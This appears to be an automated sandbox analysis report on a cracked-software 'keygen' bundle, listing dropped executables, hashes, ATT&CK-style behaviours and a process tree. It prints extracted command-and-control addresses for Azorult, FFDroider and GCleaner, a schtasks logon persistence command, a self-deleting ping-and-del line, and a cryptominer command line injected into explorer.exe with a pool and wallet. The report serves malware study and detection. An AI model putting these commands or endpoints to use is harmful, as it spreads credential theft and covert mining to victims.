Overview
overview
10Static
static
10keygen-pr.exe
windows7-x64
3keygen-pr.exe
windows10-2004-x64
3keygen-step-1.exe
windows7-x64
10keygen-step-1.exe
windows10-2004-x64
10keygen-step-3.exe
windows7-x64
7keygen-step-3.exe
windows10-2004-x64
7keygen-step-4.exe
windows7-x64
10keygen-step-4.exe
windows10-2004-x64
10keygen-step-6.exe
windows7-x64
7keygen-step-6.exe
windows10-2004-x64
7keygen.bat
windows7-x64
10keygen.bat
windows10-2004-x64
10Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 22:25
Behavioral task
behavioral1
Sample
keygen-pr.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
keygen-pr.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
keygen-step-1.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
keygen-step-1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
keygen-step-3.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
keygen-step-3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
keygen-step-4.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
keygen-step-4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
keygen-step-6.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
keygen-step-6.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
keygen.bat
Resource
win7-20240903-en
General
-
Target
keygen.bat
-
Size
149B
-
MD5
0b2622826dd00820d5725440efd7d5f4
-
SHA1
0a9f8675e9b39a984267d402449a7f2291edfb17
-
SHA256
82723c93594b47e60cc855d7d113a09763bb4636330ff44bbbb949eb0fdcf54f
-
SHA512
9f2ffa1065e7eeeda6a139ba1d85465cbb56a9be1419c90e599e604fc718244fc8b77b2bc46bbf3abba36e985b543c72d1e154e2d2d615c8519a9379e94804f3
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
ffdroider
http://186.2.171.3
Extracted
gcleaner
194.145.227.161
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jhuuee.exe family_fabookie -
FFDroider payload 3 IoCs
Processes:
resource yara_rule behavioral12/memory/4920-144-0x0000000000400000-0x0000000000667000-memory.dmp family_ffdroider behavioral12/memory/4920-150-0x0000000000400000-0x0000000000667000-memory.dmp family_ffdroider behavioral12/memory/4920-669-0x0000000000400000-0x0000000000667000-memory.dmp family_ffdroider -
Fabookie family
-
Ffdroider family
-
Gcleaner family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
OnlyLogger payload 1 IoCs
Processes:
resource yara_rule behavioral12/memory/4388-149-0x0000000000400000-0x0000000002B59000-memory.dmp family_onlylogger -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Crack.exePBrowFile28.exechrome3.exeservices64.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Crack.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation PBrowFile28.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation chrome3.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation services64.exe -
Executes dropped EXE 16 IoCs
Processes:
winnetdriv.exeCrack.exekey.exeCrack.exePBrowFile28.exechrome3.exePublicDwlBrowser188.exe2.exesetup.exejhuuee.exemd1_1eaf.exeservices64.exef2217e5f.exess.exeSetup.exesihost64.exepid process 1948 winnetdriv.exe 2052 Crack.exe 916 key.exe 2388 Crack.exe 3012 PBrowFile28.exe 3744 chrome3.exe 5020 PublicDwlBrowser188.exe 3124 2.exe 4388 setup.exe 4868 jhuuee.exe 4920 md1_1eaf.exe 464 services64.exe 688 f2217e5f.exe 1156 ss.exe 840 Setup.exe 4312 sihost64.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
md1_1eaf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 136 pastebin.com 148 pastebin.com 3 iplogger.org 5 iplogger.org 41 iplogger.org 126 raw.githubusercontent.com 127 raw.githubusercontent.com 135 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 464 set thread context of 4036 464 services64.exe explorer.exe -
Drops file in Windows directory 2 IoCs
Processes:
keygen-step-3.exedescription ioc process File opened for modification C:\Windows\winnetdriv.exe keygen-step-3.exe File created C:\Windows\winnetdriv.exe keygen-step-3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 644 4388 WerFault.exe setup.exe 116 4388 WerFault.exe setup.exe 1128 4388 WerFault.exe setup.exe 3432 4388 WerFault.exe setup.exe 3292 4388 WerFault.exe setup.exe 3176 4388 WerFault.exe setup.exe 3080 4388 WerFault.exe setup.exe 840 4388 WerFault.exe setup.exe 4244 688 WerFault.exe f2217e5f.exe 4808 4388 WerFault.exe setup.exe -
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
key.exeSetup.exekeygen-step-6.exekeygen-pr.exemd1_1eaf.exePING.EXEkeygen-step-1.exeCrack.exewinnetdriv.exeCrack.exePBrowFile28.exesetup.execmd.exef2217e5f.exekeygen-step-3.exekeygen-step-4.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language key.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-pr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language md1_1eaf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winnetdriv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PBrowFile28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2217e5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-4.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 4836 cmd.exe 2032 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
f2217e5f.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3092 schtasks.exe 4756 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
Processes:
chrome3.exeservices64.exeexplorer.exepid process 3744 chrome3.exe 3744 chrome3.exe 464 services64.exe 464 services64.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe 4036 explorer.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
2.exePublicDwlBrowser188.exechrome3.exemd1_1eaf.exess.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3124 2.exe Token: SeDebugPrivilege 5020 PublicDwlBrowser188.exe Token: SeDebugPrivilege 3744 chrome3.exe Token: SeManageVolumePrivilege 4920 md1_1eaf.exe Token: SeManageVolumePrivilege 4920 md1_1eaf.exe Token: SeManageVolumePrivilege 4920 md1_1eaf.exe Token: SeManageVolumePrivilege 4920 md1_1eaf.exe Token: SeManageVolumePrivilege 4920 md1_1eaf.exe Token: SeDebugPrivilege 1156 ss.exe Token: SeDebugPrivilege 464 services64.exe Token: SeLockMemoryPrivilege 4036 explorer.exe Token: SeLockMemoryPrivilege 4036 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Setup.exepid process 840 Setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exekeygen-step-3.exekeygen-step-4.exekeygen-pr.exeCrack.exekey.exePBrowFile28.exekeygen-step-6.execmd.exechrome3.execmd.exedescription pid process target process PID 816 wrote to memory of 208 816 cmd.exe keygen-pr.exe PID 816 wrote to memory of 208 816 cmd.exe keygen-pr.exe PID 816 wrote to memory of 208 816 cmd.exe keygen-pr.exe PID 816 wrote to memory of 4840 816 cmd.exe keygen-step-1.exe PID 816 wrote to memory of 4840 816 cmd.exe keygen-step-1.exe PID 816 wrote to memory of 4840 816 cmd.exe keygen-step-1.exe PID 816 wrote to memory of 3668 816 cmd.exe keygen-step-6.exe PID 816 wrote to memory of 3668 816 cmd.exe keygen-step-6.exe PID 816 wrote to memory of 3668 816 cmd.exe keygen-step-6.exe PID 816 wrote to memory of 1856 816 cmd.exe keygen-step-3.exe PID 816 wrote to memory of 1856 816 cmd.exe keygen-step-3.exe PID 816 wrote to memory of 1856 816 cmd.exe keygen-step-3.exe PID 816 wrote to memory of 5068 816 cmd.exe keygen-step-4.exe PID 816 wrote to memory of 5068 816 cmd.exe keygen-step-4.exe PID 816 wrote to memory of 5068 816 cmd.exe keygen-step-4.exe PID 1856 wrote to memory of 1948 1856 keygen-step-3.exe winnetdriv.exe PID 1856 wrote to memory of 1948 1856 keygen-step-3.exe winnetdriv.exe PID 1856 wrote to memory of 1948 1856 keygen-step-3.exe winnetdriv.exe PID 5068 wrote to memory of 2052 5068 keygen-step-4.exe Crack.exe PID 5068 wrote to memory of 2052 5068 keygen-step-4.exe Crack.exe PID 5068 wrote to memory of 2052 5068 keygen-step-4.exe Crack.exe PID 208 wrote to memory of 916 208 keygen-pr.exe key.exe PID 208 wrote to memory of 916 208 keygen-pr.exe key.exe PID 208 wrote to memory of 916 208 keygen-pr.exe key.exe PID 2052 wrote to memory of 2388 2052 Crack.exe Crack.exe PID 2052 wrote to memory of 2388 2052 Crack.exe Crack.exe PID 2052 wrote to memory of 2388 2052 Crack.exe Crack.exe PID 916 wrote to memory of 5016 916 key.exe key.exe PID 916 wrote to memory of 5016 916 key.exe key.exe PID 916 wrote to memory of 5016 916 key.exe key.exe PID 5068 wrote to memory of 3012 5068 keygen-step-4.exe PBrowFile28.exe PID 5068 wrote to memory of 3012 5068 keygen-step-4.exe PBrowFile28.exe PID 5068 wrote to memory of 3012 5068 keygen-step-4.exe PBrowFile28.exe PID 3012 wrote to memory of 3744 3012 PBrowFile28.exe chrome3.exe PID 3012 wrote to memory of 3744 3012 PBrowFile28.exe chrome3.exe PID 3012 wrote to memory of 5020 3012 PBrowFile28.exe PublicDwlBrowser188.exe PID 3012 wrote to memory of 5020 3012 PBrowFile28.exe PublicDwlBrowser188.exe PID 3012 wrote to memory of 3124 3012 PBrowFile28.exe 2.exe PID 3012 wrote to memory of 3124 3012 PBrowFile28.exe 2.exe PID 3012 wrote to memory of 4388 3012 PBrowFile28.exe setup.exe PID 3012 wrote to memory of 4388 3012 PBrowFile28.exe setup.exe PID 3012 wrote to memory of 4388 3012 PBrowFile28.exe setup.exe PID 3012 wrote to memory of 4868 3012 PBrowFile28.exe jhuuee.exe PID 3012 wrote to memory of 4868 3012 PBrowFile28.exe jhuuee.exe PID 5068 wrote to memory of 4920 5068 keygen-step-4.exe md1_1eaf.exe PID 5068 wrote to memory of 4920 5068 keygen-step-4.exe md1_1eaf.exe PID 5068 wrote to memory of 4920 5068 keygen-step-4.exe md1_1eaf.exe PID 3668 wrote to memory of 4836 3668 keygen-step-6.exe cmd.exe PID 3668 wrote to memory of 4836 3668 keygen-step-6.exe cmd.exe PID 3668 wrote to memory of 4836 3668 keygen-step-6.exe cmd.exe PID 4836 wrote to memory of 2032 4836 cmd.exe PING.EXE PID 4836 wrote to memory of 2032 4836 cmd.exe PING.EXE PID 4836 wrote to memory of 2032 4836 cmd.exe PING.EXE PID 3744 wrote to memory of 856 3744 chrome3.exe cmd.exe PID 3744 wrote to memory of 856 3744 chrome3.exe cmd.exe PID 856 wrote to memory of 3092 856 cmd.exe schtasks.exe PID 856 wrote to memory of 3092 856 cmd.exe schtasks.exe PID 3744 wrote to memory of 464 3744 chrome3.exe services64.exe PID 3744 wrote to memory of 464 3744 chrome3.exe services64.exe PID 5068 wrote to memory of 688 5068 keygen-step-4.exe f2217e5f.exe PID 5068 wrote to memory of 688 5068 keygen-step-4.exe f2217e5f.exe PID 5068 wrote to memory of 688 5068 keygen-step-4.exe f2217e5f.exe PID 5068 wrote to memory of 1156 5068 keygen-step-4.exe ss.exe PID 5068 wrote to memory of 1156 5068 keygen-step-4.exe ss.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exekeygen-pr.exe -p83fsase3Ge2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat4⤵PID:5016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exekeygen-step-1.exe2⤵
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exekeygen-step-6.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exekeygen-step-3.exe2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 03⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exekeygen-step-4.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2388
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:3092
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit6⤵PID:4836
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:4756
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
PID:4312
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 7885⤵
- Program crash
PID:644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 7925⤵
- Program crash
PID:116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 9405⤵
- Program crash
PID:1128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 9725⤵
- Program crash
PID:3432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 10285⤵
- Program crash
PID:3292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 11485⤵
- Program crash
PID:3176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 11565⤵
- Program crash
PID:3080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 13925⤵
- Program crash
PID:840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 11925⤵
- Program crash
PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"4⤵
- Executes dropped EXE
PID:4868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 3524⤵
- Program crash
PID:4244
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:840
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4388 -ip 43881⤵PID:2824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 43881⤵PID:4592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 43881⤵PID:3692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4388 -ip 43881⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 43881⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4388 -ip 43881⤵PID:464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4388 -ip 43881⤵PID:1104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 43881⤵PID:2052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 688 -ip 6881⤵PID:1840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 43881⤵PID:3308
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5a5bace3c3c2fa1cb766775746a046594
SHA19998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA51266f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184
-
Filesize
101KB
MD513e802bd360e44591d7d23036ce1fd33
SHA1091a58503734848a4716382862526859299ef345
SHA256e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA5128bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b
-
Filesize
56KB
MD57126148bfe5ca4bf7e098d794122a9a3
SHA13fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA5120bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48
-
Filesize
1.8MB
MD58902f8193024fa4187ca1aad97675960
SHA137a4840c9657205544790c437698b54ca33bfd9d
SHA25695de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938
-
Filesize
1.6MB
MD57009fb80a52366b6c2cd8ec052a65791
SHA1db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA51226e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079
-
Filesize
14.0MB
MD5f648d6275daa9e8931d9f308effb2e54
SHA1c70e546ed9748f2e82411bf74f26913165568e68
SHA2561c97e0f7c63973051f4789977ff99a48e57a7d652ecdd13e2baa23e574da03c2
SHA5126a01951cb168960cc703fb3d9ef30d41d2a8b551cb6d73700654b8c4ca91ad477b1eabe85b3563f8ea3400c9107b2bfa3302334471db6f2a52f0e4848a1de597
-
Filesize
52KB
MD5be1369965ea491a565233a8c107517ac
SHA130491598ca4a6658a80c5747b309375e442b8ce3
SHA2560a52209b70d488721639a45e9997068e4cac3eaf6a4b8316d870e4a7b11285e5
SHA51212c2e58a81908f14a94bbed1c8199e2a580bfef2df88f9b2f76ad09620fa376248b891cd7e92a8ba1d7da4bbe5d932842b503ef900b4ac7e8eb16e1a3a93794c
-
Filesize
16KB
MD588d88711598409c91cb0bf7a163ac6ba
SHA19ec2e16eb9e63b3489cef82dde59cd96af9a79ee
SHA2562da7cbc011b75277e017a54f9092ad9984aa9d8e5dab82122ce08b98b9bd76b1
SHA51274ea46be227a919b208ab9b06f851b0076510ccba3b6032534d742702c85ad61843bef7e1add37b47026bc9f8f5f1996922339fc38c212220ea6f872756c7a06
-
Filesize
16KB
MD55d9270ca7f3d21d2c85271e25df5b750
SHA1c324dbe597897807248d70eb5c2ff3ae88101f8b
SHA256267b645fc4f9eeade4f0eabd14b52f87d07fed7858e9126a761555a153b8045f
